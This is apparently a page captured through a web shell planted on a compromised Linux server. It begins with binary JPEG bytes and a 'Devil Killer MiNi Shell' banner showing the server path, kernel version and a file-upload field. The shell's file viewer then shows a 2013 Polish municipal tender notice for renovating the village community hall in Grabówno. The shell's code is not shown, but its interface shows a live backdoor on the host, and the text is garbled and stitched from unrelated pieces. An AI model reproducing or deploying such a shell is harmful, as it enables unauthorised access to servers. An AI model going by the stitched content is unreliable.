JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130201/44594-N-2013.html

<p class="kh_header"><b>Miasteczko Krajeńskie: Przebudowa i modernizacja świetlicy wiejskiej w Grabównie</b><br>
<b>Numer ogłoszenia: 44594 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasteczko Krajeńskie , ul. Dąbrowskiego 16, 89-350 Miasteczko Krajeńskie, woj. wielkopolskie, tel. 067 2873196, faks 067 2873197.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://miasteczko.kraj.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i modernizacja świetlicy wiejskiej w Grabównie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świetlica wiejska.
Przebudowa i modernizacja świetlicy wiejskiej w Grabównie polegać ma na dostosowaniu obiektu do dostępu osób niepełnosprawnych oraz do obowiązującego prawa i przepisów szczegółowych. Nie przewiduje się zmian konstrukcyjnych obiektu, wymagających uzyskania pozwolenia na budowę. 
W skład świetlicy wchodzą następujące pomieszczenia: holl, sanitariaty, kuchnia     z zapleczem,  sala główna ze sceną i pomieszczeniem magazynowym.
 Na zewnątrz: zadaszone wejście główne ze schodami,  zadaszony taras ze schodami zewnętrznymi, podjazd dla niepełnosprawnych, parking. 
Szczegółowy opis projektowanych prac:
fundamenty -  nie są przewidziane żadne zmiany konstrukcyjne w istniejących fundamentach, 
izolacje poziome i pionowe - nie przewiduje się zmian w izolacjach przeciwwilgociowych istniejących fundamentów i ścian, 
podłogi i posadzki: 
na scenie - podłogę na scenie wraz ze ścianką czołową pozostawić  z desek drewnianych, po naprawie miejscowej  wycyklinować i polakierować lakierem bezbarwnym,
na sali głównej - drewnianą podłogę na legarach rozebrać, następnie wykonać podkład betonowy  grub. 10 cm, izolację poziomą 1 x folia PE, izolacja cieplna z płyt styropianowych podłoga grub. 10 cm, warstwa wyrównawcza zbrojona z zaprawy cementowej grub. 6-7 cm, następnie posadzka z płytek ceramicznych antypoślizgowych 30 x 30 cm metodą kombinowaną wraz z cokolikami o wysokości 15 cm.
w pozostałych pomieszczeniach tj. nr 4,5,6 i7 po zerwaniu istniejącej posadzki wykonać licowanie  płytkami ceramicznymi antypoślizgowymi 30 x 30 cm metodą kombinowaną wraz z cokolikami o wysokości 15 cm.
stolarka okienna - okna na sali głównej, scenie i pomieszczeniu magazynowym nr 2 do wymiany. Po demontażu istniejących drewnianych okien, skuciu  węgarków, należy zmniejszyć rozmiary okien poprzez wymurowanie filarów o wymiarach 1 x 1? cegły z cegły pełnej klasy 150 na zaprawie M 15. Okna uchylno-rozwieralne  z profili PCV przeszklone o współczynniku k = 1,1.
okna wyposażone w rolety w kasetkach z prowadnicą.
drzwi zewnętrzne  drewniane 3 pary do demontażu w ich miejsce zamontować : 
drzwi wejściowe z profili PCV, przeszklone, k = 1,1 o wym. 140x305 cm szt.1  
drzwi tarasowe z profili PCV, przeszklone, k = 1,1 o wym. 190x203 cm szt. 1  i naświetlem z profili PCV, przeszklone, k = 1,1  o wym. 195x70 cm szt. 1
drzwi stalowe z naświetlem ocieplane, szło k = 1,1 o wym.90x273 cm. 
drzwi wewnętrzne - istniejące drzwi wewnętrzne w pom. nr 1,2,5,6, do demontażu w ich miejsce zamontować drzwi płytowe o wym. 90x 200 cm, szt.5, w pomieszczeniu nr 7 wymienić drzwi na płytowe o wym. 80x200 szt. 1 
drzwi wejściowe do sali głównej, pom. nr 3  zdemontować i w to miejsce zamontować drzwi dwudzielne z profili PCV, przeszklone o wymiarach 150x225 szt. nie ujęto w przedmiarze.
schody drewniane wewnętrzne przenośne -  należy wykonać nowe schody drewniane - wejście na scenę - 2 szt.
tynki i okładziny wewnętrzne - Dotyczy wszystkich pomieszczeń objętych projektem budowlanym w tym ściany i sufity.
Nowe tynki wewnętrzne cementowo-wapienne III kat. Tynki istniejące do naprawy w ilości 15 % powierzchni. Całość tynków wewnętrznych w części podlegającej modernizacji po zagruntowaniu preparatami wzmacniającymi podłoże, wykończyć gładzią gipsową jednowarstwową grub. 3 mm.
w sanitariatach tj. pom. nr 5, 6, 7 ściany oblicować płytkami ściennymi                 o wymiarach 20x30 cm na pełną wysokość na klej.
w kuchni - po rozbiórce pieca kaflowego należy oblicować ścianę płytkami ściennymi dobierając podobny wzór i kolor.
w sali głównej  po ułożeniu powłok malarskich należy zamontować na ścianach zewnętrznych listwy z płyty laminowanej drewnopodobnej                         o szerokości min. 25 cm ok. 30 mb.
na scenie przy oknach 2szt. należy wykonać  zabezpieczenie z rury  zamontowanej do ściany poziomo na wysokości ok. 70 -80 cm nad podłogą.
Do nadproża sceny zamontować rurę stalową z uchwytami do zawieszenia kurtyny.
na ścianie szczytowej sali głównej od strony wejścia należy ułożyć  na pow. ok. 12,5 m2 obudowany w ramie drewnianej panel korkowy na uprzednio przygotowanym podłożu według technologii i zaleceń producenta, grubość panelu min. 10 mm.
na ścianach sali głównej i sceny wokół ścian zewnętrznych pod sufitem zamontować uchwyty i połączyć je linką stalową o grub. Ok. 1,5 - 2,0 mm z przeznaczeniem do montażu dekoracji
powłoki malarskie wewnętrzne- Dotyczy wszystkich pomieszczeń objętych projektem budowlanym w tym ściany i sufity.
Po zagruntowaniu podłoża preparatami wzmacniającymi podłoże i wykonaniu gładzi gipsowej wykonać dwukrotne malowanie podłoży gipsowych farbami emulsyjnymi.
termoizolacja dachu pokrytego papą- termoizolacja dachu 15 cm styropapa mocowana do istniejącego podłoża dyblami. Na krawędzi dachu ułożyć mocowaną do podłoża podwalinę z drewna o przekroju 12x14 cm do mocowania uchwytów rynnowych. Wykończenie - druga warstwa papy zgrzewalnej.
termoizolacja ścian  i cokołów- Dotyczy ścian zewnętrznych sali głównej, ściany przy tarasie na szerokość tarasu, ścian zaplecza kuchennego
termoizolacja ścian zewnętrznych płytami styropianowymi grub. 12 m                   w jednej z technologii systemowej, po przygotowaniu i zagruntowaniu podłoża z ręcznym wykonaniem  wyprawy cienkowarstwowej barwionej w masie. Termoizolacja cokołów sali głównej i zaplecza płytami styropianowymi grub. 10 cm i do głębokości 50 cm poniżej gruntu, wykończenie cokołów  wyprawą cienkowarstwową  żywiczną akrylową mozaikową uwzględnić cokół tarasowy wraz ze schodami oraz cokół wejścia głównego.
 opierzenia elementów dachowych- Dotyczy Sali głównej i zaplecza kuchennego. Obróbki i opierzenia wszystkich elementów dachowych  wykonać z blachy stalowej ocynkowanej.
rynny i rury spustowe - Dotyczy Sali głównej i zaplecza kuchennego. Rynny półokrągłe o średnicy 12 cm oraz 15 cm z blachy stalowej ocynkowanej. Rury spustowe okrągłe o średnicy 10 oraz 12 cm z blachy stalowej ocynkowanej.
opaska, nawierzchnia tarasu, podjazdu i chodniki - wzdłuż ścian zewnętrznych budynku opaska betonowa o szerokości 60 cm z kostki betonowej o grub. 6 cm ze spadkiem 1,5 % od budynku, nawierzchnia tarasu, podjazdu dla niepełnosprawnych i chodniki z kostki betonowej grub. 6 cm na podsypce cementowo - piaskowej.
podjazd dla niepełnosprawnych - przed wejściem do budynku wykonać podjazd dla osób niepełnosprawnych utwardzony kostką betonową typu polbruk, układanym na chudym betonie B8 grub. 10 cm i warstwą ubitego piasku stabilizowanego cementem  o grub. 20 cm. Na podjeździe zamontować balustrady ze stali nierdzewnej z pochwytem podwójnym dla niepełnosprawnych.
taras zewnętrzny - istniejące blaszane pokrycie zadaszenia nad tarasem należy zdemontować , wykonać na istniejącej konstrukcji, po uprzednim wzmocnieniu słupków tarasu  i rygla dwoma ceownikami C 120                                   z zespawaniem łączeń i pomalowaniem, zadaszenie z płyt poliwęglanowych w kolorze bezbarwnym matowym.  Nawierzchnia tarasu z kostki betonowej grub. 6 cm na podsypce cementowo - piaskowej. Cokół tarasu wykończyć  wyprawą cienkowarstwową  żywiczną akrylową mozaikową
wentylacja - przewody wentylacyjne grawitacyjne należy wyprowadzić ponad dach budynku. Wentylację pomieszczeń sanitarnych należy wyposażyć we wspomaganie mechaniczne. Wykonać wentylację grawitacyjną dla wewnętrznej kanalizacji sanitarnej.
ogrzewanie - sala główna ogrzewana jest nagrzewnicą nadmuchową -                   z istniejącej instalacji. Ogrzewanie pomieszczeń sanitarnych i zaplecza kuchennego grzejnikami z instalacji grzewczej  z kotłem na gaz - instalacja istniejąca. Ciepła woda z kotła dwufunkcyjnego gazowego - instalacja istniejąca oraz z przepływowych urządzeń elektrycznych. Uwaga: w ramach modernizacji  wymagana jest przebudowa instalacji zimnej wody, cwu, co,                   i częściowo armatury, opisano w inst. sanitarnych, przed wykonaniem docieplenia ścian należy wykonać przedłużenie rur doprowadzających powietrze i odprowadzających spaliny z nagrzewnicy gazowej. 
schody zewnętrzne - wykonanie nowych schodów zewnętrznych tarasowych,  odnowienie głównych schodów wejściowych wraz z zadaszeniem, licowanie nawierzchni schodów płytkami antypoślizgowymi - mrozoodpornymi. Cokół murki oporowe  schodów  wykończyć  wyprawą cienkowarstwową  żywiczną akrylową mozaikową.
instalacja gazowa - należy wymienić skrzynkę gazową na nową.
instalacja elektryczna -  instalacja elektryczna wymaga modernizacji                     w zakresie wymiany opraw w kuchni, na scenie, w magazynie, wejściu i sali głównej. Modernizacji podlega również tablica licznikowo- bezpiecznikowa.  Z uwagi na dość znaczny stopień zużycia wymianie podlegać będzie część instalacji oświetleniowej przewody, osprzęt i gniazd wtykowych przewody, osprzęt. 
przed wymianą instalacji oświetleniowej należy zdemontować częściowo             a następnie po ułożeniu instalacji zamontować ponownie lub wymienić na nowe płytki podsufitowe.
instalacja sanitarna - obiekt należy wyposażyć w instalację:
ciepłej wody użytkowej z rur tworzywowych PP łączonych metodą zgrzewaną,
zimnej wody użytkowej z rur tworzywowych PP łączonych metodą zgrzewaną,
kanalizację sanitarną z rur PVC,
biały montaż,
pochwyty dla niepełnosprawnych
przeniesienie grzejnika co.
Zagospodarowanie terenu.
W ramach zagospodarowania terenu należy wykonać parking i utwardzenie nawierzchni    o powierzchni: 114,85 m2 , podjazd dla niepełnosprawnych o nawierzchni z kostki betonowej. Układ wg projektu zagospodarowania terenu i opisu technicznego. Rozbiórkę istniejącego ogrodzenia wraz z podmurówką.
Ze względu na to, że roboty będą się odbywały w sąsiedztwie terenu sportowo -rekreacyjnego boisko sportowe i plac zabaw Zamawiający ma następujące wymagania:
teren budowy należy zabezpieczyć przed dostępem osób nieupoważnionych w taki sposób aby bezpiecznie można  było korzystać  co najmniej z placu zabaw.
UWAGA: załączony przedmiar jest materiałem pomocniczym i może nie obejmować niektórych robót wymienionych  w SIWZ oraz projekcie budowlanym, oferent zobowiązany jest sporządzić własną kalkulacje robót.
Szczegółowy przedmiot zamówienia jest opisany w dokumentacji projektowej, przedmiarze robót, która stanowi załącznik nr 7 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.00.00-0, 45.44.21.00-8, 45.42.10.00-4, 45.31.00.00-3, 45.22.33.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 7.000,00 zł
Wadium winno być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
pieniądzu, wpłaconym przelewem na rachunek bankowy Zamawiającego - Bank 
Spółdzielczy Białośliwie nr konta: 62 8937 0007 0000 0404 2000 0005
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym.
 gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. Nr 109, poz. 1158 z późn. zm.
Dowód wniesienia wadium powinien być dołączony do oferty.
Uwaga:  W przypadku wnoszenia wadium w formie gwarancji lub poręczeń 
oryginału dokumentu wadialnego nie należy trwale łączyć z dokumentami oferty.  W dokumenty oferty należy wpiąć kopię, a oryginał złożyć wraz z ofertą np. w kopercie.
Wadium, o którym mowa w ppkt a zostanie uznane za wpłacone w terminie, jedynie pod warunkiem, że pieniądze znajdą się na koncie Zamawiającego przed upływem terminu składania ofert. 
W przypadku Wykonawców składających wspólną ofertę, wadium winno być wniesione przez ustanowionego pełnomocnika (lidera) w imieniu wszystkich Wykonawców składających wspólną ofertę.
Wadium musi obejmować cały okres związania ofertą. Gwarancje bankowe, 
ubezpieczeniowe, lub poręczenia winny posiadać ważność od dnia składania i otwarcia 
ofert.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Wykonawca, który nie wniesie wadium w formie lub formach, o których mowa w pkt. 24.2. zostanie wykluczony z postępowania.
Zamawiający dokona niezwłocznie zwrotu wadium, jeżeli:
 upłynie termin związania ofertą;
 zostanie zawarta umowa i wniesione zabezpieczenie należytego wykonania umowy;
 Zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte 
lub upłynie termin ich wnoszenia.
Zamawiający dokona niezwłocznie zwrotu wadium na pisemny wniosek Wykonawcy:który wycofał ofertę przed upływem terminu do składania ofert;
który został wykluczony z postępowania;
którego oferta została odrzucona z innych przyczyn, niż wskazane w pkt. b.
Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym 
 zwrócono wadium po ich wykluczeniu z postępowania, lub oferta została odrzucona, 
 jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność 
 wykluczenia wykonawcy, lub odrzucenia oferty. W takim przypadku wykonawcy 
 ponownie wnoszą wadium w terminie określonym przez Zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami 
wynikającymi z umowy rachunku bankowego, na którym jest ono przechowywane, 
pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew 
pieniędzy na rachunek wskazany przez Wykonawcę.
Wykonawca, którego oferta została wybrana, utraci wadium wraz z odsetkami na rzecz 
Zamawiającego w przypadku, gdy:
Wykonawca odmówi podpisania umowy w sprawie niniejszego zamówienia 
publicznego na warunkach określonych w ofercie;
Wykonawca nie wniesie zabezpieczenia należytego wykonania umowy;
zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26, ust.3 upzp nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 upzp lub pełnomocnictw, chyba że udowodni, ze wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować, żę posiada uprawnienia do wykonawstwa określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować, że wiedzę i doświadczenie.W tym względzie udokumentuje, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie zrealizował                z należytą starannością co najmniej dwie roboty budowlane polegające na budowie, przebudowie, rozbudowie lub modernizacji obiektu użyteczności publicznej, o wartości nie mniejszej niż 300 000 złotych słownie: trzysta tysięcy złotych każda oraz udokumentuje, że wykonał je zgodnie z zasadami sztuki budowlanej i prawidłowo je ukończył.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje odpowiednim potencjałem technicznym  wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować, że dysponuje osobami zdolnymi do zrealizowania zamówienia. 
Zamawiający wymaga, aby Wykonawca dysponował następującą kadrą do zatrudnienia na budowie, posiadającą uprawnienia określone ustawą Prawo budowlane: kierownik budowy,  kierownik robót elektrycznych, kierownik robót sanitarnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany udokumentować, że znajduje się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie zamówienia i w tym względzie udokumentuje, że: 
dysponuje środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż 300 000 złotych słownie: trzysta tysięcy złotych,
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 300 000 zł
Jeżeli Wykonawca będzie polegał na zdolności finansowej innego podmiotu, wówczas do oferty należy załączyć pisemne zobowiązanie tego podmiotu o udostępnieniu środków finansowych Wykonawcy wraz z informacją banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym ten podmiot posiada rachunek potwierdzającą spełnienie warunku określonego w pkt. 6.3. ppkt. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
